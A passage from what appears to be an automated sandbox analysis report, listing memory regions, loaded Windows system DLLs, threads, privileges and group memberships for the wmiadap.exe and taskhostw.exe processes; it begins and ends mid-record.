mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 4181 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4182 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4183 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4184 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4185 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4186 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4187 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4188 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4189 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4190 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4191 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4192 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4193 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4194 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4195 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4196 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4197 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4198 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4199 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4200 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4201 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4202 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 767 os_tid = 0x908 Thread: id = 768 os_tid = 0x544 Thread: id = 769 os_tid = 0x24c Thread: id = 770 os_tid = 0xb30 Thread: id = 771 os_tid = 0xe54 Thread: id = 772 os_tid = 0x6e0 Thread: id = 773 os_tid = 0xab4 Process: id = "79" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x418b000" os_pid = "0x48c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5203 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5204 start_va = 0x76bff60000 end_va = 0x76bff6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076bff60000" filename = "" Region: id = 5205 start_va = 0x76bff70000 end_va = 0x76bff76fff entry_point = 0x0 region_type = private name = "private_0x00000076bff70000" filename = "" Region: id = 5206 start_va = 0x76bff80000 end_va = 0x76bff93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076bff80000" filename = "" Region: id = 5207 start_va = 0x76bffa0000 end_va = 0x76c001ffff entry_point = 0x0 region_type = private name = "private_0x00000076bffa0000" filename = "" Region: id = 5208 start_va = 0x76c0020000 end_va = 0x76c0023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0020000" filename = "" Region: id = 5209 start_va = 0x76c0030000 end_va = 0x76c0030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0030000" filename = "" Region: id = 5210 start_va = 0x76c0040000 end_va = 0x76c0041fff entry_point = 0x0 region_type = private name = "private_0x00000076c0040000" filename = "" Region: id = 5211 start_va = 0x76c0050000 end_va = 0x76c00cffff entry_point = 0x0 region_type = private name = "private_0x00000076c0050000" filename = "" Region: id = 5212 start_va = 0x76c00d0000 end_va = 0x76c00d6fff entry_point = 0x0 region_type = private name = "private_0x00000076c00d0000" filename = "" Region: id = 5213 start_va = 0x76c00e0000 end_va = 0x76c01dffff entry_point = 0x0 region_type = private name = "private_0x00000076c00e0000" filename = "" Region: id = 5214 start_va = 0x76c01e0000 end_va = 0x76c029dfff entry_point = 0x76c01e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5215 start_va = 0x76c02a0000 end_va = 0x76c031ffff entry_point = 0x0 region_type = private name = "private_0x00000076c02a0000" filename = "" Region: id = 5216 start_va = 0x76c0320000 end_va = 0x76c0320fff entry_point = 0x0 region_type = private name = "private_0x00000076c0320000" filename = "" Region: id = 5217 start_va = 0x76c0330000 end_va = 0x76c0330fff entry_point = 0x0 region_type = private name = "private_0x00000076c0330000" filename = "" Region: id = 5218 start_va = 0x76c0340000 end_va = 0x76c0340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0340000" filename = "" Region: id = 5219 start_va = 0x76c0350000 end_va = 0x76c0350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0350000" filename = "" Region: id = 5220 start_va = 0x76c0380000 end_va = 0x76c038ffff entry_point = 0x0 region_type = private name = "private_0x00000076c0380000" filename = "" Region: id = 5221 start_va = 0x76c0390000 end_va = 0x76c0517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0390000" filename = "" Region: id = 5222 start_va = 0x76c0520000 end_va = 0x76c06a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c0520000" filename = "" Region: id = 5223 start_va = 0x76c06b0000 end_va = 0x76c076ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000076c06b0000" filename = "" Region: id = 5224 start_va = 0x76c0770000 end_va = 0x76c0aa6fff entry_point = 0x76c0770000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5225 start_va = 0x76c0ab0000 end_va = 0x76c0b2ffff entry_point = 0x0 region_type = private name = "private_0x00000076c0ab0000" filename = "" Region: id = 5226 start_va = 0x76c0b30000 end_va = 0x76c0baffff entry_point = 0x0 region_type = private name = "private_0x00000076c0b30000" filename = "" Region: id = 5227 start_va = 0x76c0bb0000 end_va = 0x76c0c2ffff entry_point = 0x0 region_type = private name = "private_0x00000076c0bb0000" filename = "" Region: id = 5228 start_va = 0x7df5ff890000 end_va = 0x7ff5ff88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff890000" filename = "" Region: id = 5229 start_va = 0x7ff6ee360000 end_va = 0x7ff6ee45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ee360000" filename = "" Region: id = 5230 start_va = 0x7ff6ee460000 end_va = 0x7ff6ee482fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6ee460000" filename = "" Region: id = 5231 start_va = 0x7ff6ee483000 end_va = 0x7ff6ee484fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee483000" filename = "" Region: id = 5232 start_va = 0x7ff6ee485000 end_va = 0x7ff6ee486fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee485000" filename = "" Region: id = 5233 start_va = 0x7ff6ee487000 end_va = 0x7ff6ee488fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee487000" filename = "" Region: id = 5234 start_va = 0x7ff6ee489000 end_va = 0x7ff6ee48afff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee489000" filename = "" Region: id = 5235 start_va = 0x7ff6ee48b000 end_va = 0x7ff6ee48cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee48b000" filename = "" Region: id = 5236 start_va = 0x7ff6ee48d000 end_va = 0x7ff6ee48efff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee48d000" filename = "" Region: id = 5237 start_va = 0x7ff6ee48f000 end_va = 0x7ff6ee48ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6ee48f000" filename = "" Region: id = 5238 start_va = 0x7ff6ee7b0000 end_va = 0x7ff6ee7defff entry_point = 0x7ff6ee7b0000 region_type = mapped_file name = "wmiadap.exe" filename = "\\Windows\\System32\\wbem\\WMIADAP.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiadap.exe") Region: id = 5239 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 5240 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 5241 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 5242 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 5243 start_va = 0x7ffaf0240000 end_va = 0x7ffaf0264fff entry_point = 0x7ffaf0240000 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 5244 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5245 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5246 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5247 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5248 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5249 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5250 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5251 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5252 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5253 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5254 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5255 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5256 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5257 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5258 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5259 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5260 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5261 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5262 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6412 start_va = 0x7ffaf7180000 end_va = 0x7ffaf7187fff entry_point = 0x7ffaf7180000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Thread: id = 774 os_tid = 0xe14 Thread: id = 775 os_tid = 0xe18 Thread: id = 776 os_tid = 0x7dc Thread: id = 777 os_tid = 0x53c Thread: id = 778 os_tid = 0x5dc Thread: id = 779 os_tid = 0x6fc Process: id = "80" image_name = "taskhostw.exe" filename = "c:\\windows\\system32\\taskhostw.exe" page_root = "0x76bb2000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x318" cmd_line = "taskhostw.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6012 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6013 start_va = 0x100c270000 end_va = 0x100c27ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c270000" filename = "" Region: id = 6014 start_va = 0x100c280000 end_va = 0x100c286fff entry_point = 0x0 region_type = private name = "private_0x000000100c280000" filename = "" Region: id = 6015 start_va = 0x100c290000 end_va = 0x100c2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c290000" filename = "" Region: id = 6016 start_va = 0x100c2b0000 end_va = 0x100c32ffff entry_point = 0x0 region_type = private name = "private_0x000000100c2b0000" filename = "" Region: id = 6017 start_va = 0x100c330000 end_va = 0x100c333fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c330000" filename = "" Region: id = 6018 start_va = 0x100c340000 end_va = 0x100c340fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c340000" filename = "" Region: id = 6019 start_va = 0x100c350000 end_va = 0x100c351fff entry_point = 0x0 region_type = private name = "private_0x000000100c350000" filename = "" Region: id = 6020 start_va = 0x100c360000 end_va = 0x100c3dffff entry_point = 0x0 region_type = private name = "private_0x000000100c360000" filename = "" Region: id = 6021 start_va = 0x100c3e0000 end_va = 0x100c3e6fff entry_point = 0x0 region_type = private name = "private_0x000000100c3e0000" filename = "" Region: id = 6022 start_va = 0x100c3f0000 end_va = 0x100c3f0fff entry_point = 0x100c3f0000 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 6023 start_va = 0x100c400000 end_va = 0x100c400fff entry_point = 0x0 region_type = private name = "private_0x000000100c400000" filename = "" Region: id = 6024 start_va = 0x100c410000 end_va = 0x100c50ffff entry_point = 0x0 region_type = private name = "private_0x000000100c410000" filename = "" Region: id = 6025 start_va = 0x100c510000 end_va = 0x100c5cdfff entry_point = 0x100c510000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6026 start_va = 0x100c5d0000 end_va = 0x100c5d0fff entry_point = 0x0 region_type = private name = "private_0x000000100c5d0000" filename = "" Region: id = 6027 start_va = 0x100c5e0000 end_va = 0x100c5e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c5e0000" filename = "" Region: id = 6028 start_va = 0x100c5f0000 end_va = 0x100c5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c5f0000" filename = "" Region: id = 6029 start_va = 0x100c600000 end_va = 0x100c600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c600000" filename = "" Region: id = 6030 start_va = 0x100c610000 end_va = 0x100c611fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c610000" filename = "" Region: id = 6031 start_va = 0x100c620000 end_va = 0x100c622fff entry_point = 0x100c620000 region_type = mapped_file name = "radarrs.dll.mui" filename = "\\Windows\\System32\\en-US\\radarrs.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\radarrs.dll.mui") Region: id = 6032 start_va = 0x100c630000 end_va = 0x100c63ffff entry_point = 0x0 region_type = private name = "private_0x000000100c630000" filename = "" Region: id = 6033 start_va = 0x100c640000 end_va = 0x100c6bffff entry_point = 0x0 region_type = private name = "private_0x000000100c640000" filename = "" Region: id = 6034 start_va = 0x100c6c0000 end_va = 0x100c847fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c6c0000" filename = "" Region: id = 6035 start_va = 0x100c850000 end_va = 0x100c9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c850000" filename = "" Region: id = 6036 start_va = 0x100c9e0000 end_va = 0x100dddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100c9e0000" filename = "" Region: id = 6037 start_va = 0x100dde0000 end_va = 0x100de97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100dde0000" filename = "" Region: id = 6038 start_va = 0x100dea0000 end_va = 0x100df1ffff entry_point = 0x0 region_type = private name = "private_0x000000100dea0000" filename = "" Region: id = 6039 start_va = 0x100df20000 end_va = 0x100df9ffff entry_point = 0x0 region_type = private name = "private_0x000000100df20000" filename = "" Region: id = 6040 start_va = 0x100dfa0000 end_va = 0x100dfa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000100dfa0000" filename = "" Region: id = 6041 start_va = 0x100dfb0000 end_va = 0x100dfbffff entry_point = 0x0 region_type = private name = "private_0x000000100dfb0000" filename = "" Region: id = 6042 start_va = 0x100e020000 end_va = 0x100e02ffff entry_point = 0x0 region_type = private name = "private_0x000000100e020000" filename = "" Region: id = 6043 start_va = 0x100e100000 end_va = 0x100e20ffff entry_point = 0x0 region_type = private name = "private_0x000000100e100000" filename = "" Region: id = 6044 start_va = 0x100e330000 end_va = 0x100e3bffff entry_point = 0x0 region_type = private name = "private_0x000000100e330000" filename = "" Region: id = 6045 start_va = 0x7df5ff470000 end_va = 0x7ff5ff46ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff470000" filename = "" Region: id = 6046 start_va = 0x7ff682bd0000 end_va = 0x7ff682ccffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff682bd0000" filename = "" Region: id = 6047 start_va = 0x7ff682cd0000 end_va = 0x7ff682cf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff682cd0000" filename = "" Region: id = 6048 start_va = 0x7ff682cf4000 end_va = 0x7ff682cf5fff entry_point = 0x0 region_type = private name = "private_0x00007ff682cf4000" filename = "" Region: id = 6049 start_va = 0x7ff682cf6000 end_va = 0x7ff682cf7fff entry_point = 0x0 region_type = private name = "private_0x00007ff682cf6000" filename = "" Region: id = 6050 start_va = 0x7ff682cf8000 end_va = 0x7ff682cf8fff entry_point = 0x0 region_type = private name = "private_0x00007ff682cf8000" filename = "" Region: id = 6051 start_va = 0x7ff682cfa000 end_va = 0x7ff682cfbfff entry_point = 0x0 region_type = private name = "private_0x00007ff682cfa000" filename = "" Region: id = 6052 start_va = 0x7ff682cfc000 end_va = 0x7ff682cfdfff entry_point = 0x0 region_type = private name = "private_0x00007ff682cfc000" filename = "" Region: id = 6053 start_va = 0x7ff682cfe000 end_va = 0x7ff682cfffff entry_point = 0x0 region_type = private name = "private_0x00007ff682cfe000" filename = "" Region: id = 6054 start_va = 0x7ff683440000 end_va = 0x7ff683458fff entry_point = 0x7ff683440000 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 6055 start_va = 0x7ffae0030000 end_va = 0x7ffae00cdfff entry_point = 0x7ffae0030000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 6056 start_va = 0x7ffaeb6f0000 end_va = 0x7ffaeb6f9fff entry_point = 0x7ffaeb6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6057 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6058 start_va = 0x7ffaecef0000 end_va = 